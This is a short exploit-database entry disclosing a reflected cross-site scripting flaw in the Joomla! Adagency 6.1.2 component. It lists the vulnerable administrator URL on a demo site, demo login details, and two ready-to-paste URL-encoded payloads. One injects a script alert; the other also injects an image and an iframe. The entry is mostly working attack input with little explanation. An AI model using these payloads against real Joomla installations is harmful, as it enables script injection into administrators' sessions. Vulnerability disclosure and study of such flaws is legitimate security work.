Share
## https://sploitus.com/exploit?id=PACKETSTORM:158934
# Exploit Title: Joomla! Adagency V 6.1.2 Cross Site Scripting  
# Date: 24.07.2020  
# Author: Vincent666 ibn Winnie  
# Software Link: https://adagency.ijoomla.com/  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# Blog : https://pentest-vincent.blogspot.com/  
# PoC:https://pentest-vincent.blogspot.com/2020/08/joomla-adagency-v-612-cross-site.html  
  
PoC:  
  
https://ijoomlademo.com  
  
user demo  
  
password demo  
  
Example with xss code injection:  
  
https://ijoomlademo.com/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E  
  
Example with xss/html code injection :  
  
https://ijoomlademo.com/administrator/index.php?option=com_adagency&controller=adagencyAbout&task=vimeo&id=%22%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E%22%3E%3Cbody%20background=%22https://i.gifer.com/IrM.gif%22%3E%3Cscript%3Ealert(%22Cross%20site%20scripting%20and%20html%20code%20injection%22)%3C/script%3E%3Ciframe%20width=%22540%22%20height=%22450%22%20src=%22http://www.youtube.com/embed/s5_XkjC2fGY%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E  
  
Video PoC:  
  
https://www.youtube.com/watch?v=APDqKv88znw  
  
Picture:  
  
https://imgur.com/a/w2attqc  
  
XSS code on the pastebin:  
  
https://pastebin.com/bRSnjZtL